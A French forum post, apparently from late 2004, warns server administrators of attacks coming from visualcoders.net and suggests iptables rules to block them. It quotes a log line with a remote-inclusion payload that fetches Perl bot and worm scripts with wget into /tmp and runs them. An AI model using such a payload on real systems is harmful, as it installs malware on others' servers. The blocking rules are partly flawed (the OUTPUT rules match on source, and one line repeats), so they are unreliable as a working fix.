Il n'est pas dans les habitudes du Hub de montrer du doigt, et les règles du forum demandent d'éviter cette attitude.
Je prend la liberté de passer outre ces règles pour signaler des attaques de serveurs dédiés au départ d'un site www.visualcoders.net .
Si vous trouvez les chaînes de caractères du style:
CODE
milan.dnstraffic.net - - [25/Dec/2004:12:22:12 +0100] "GET /index.php?amp;act=Search&f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 63629 "-" "LWP::Simple/5.803"
dans vos logs, cela signifie qu'une attaque est en cours.L'origine (ici milan.dnstraffic.net) peut changer dans vos logs.
Je m'occupe de bloquer le firewall en entrée/sortie pour les dédiés dont j'ai la charge. Pour les autres, si vous avez iptables configuré, il suffit de lancer ces 2 commandes pour bloquer le trafic de visualcoders.net:
CODE
/sbin/iptables -A INPUT -s www.visualcoders.net -j DROP
/sbin/iptables -A OUTPUT -s www.visualcoders.net -j DROP
/sbin/iptables -A OUTPUT -s www.visualcoders.net -j DROP
Dan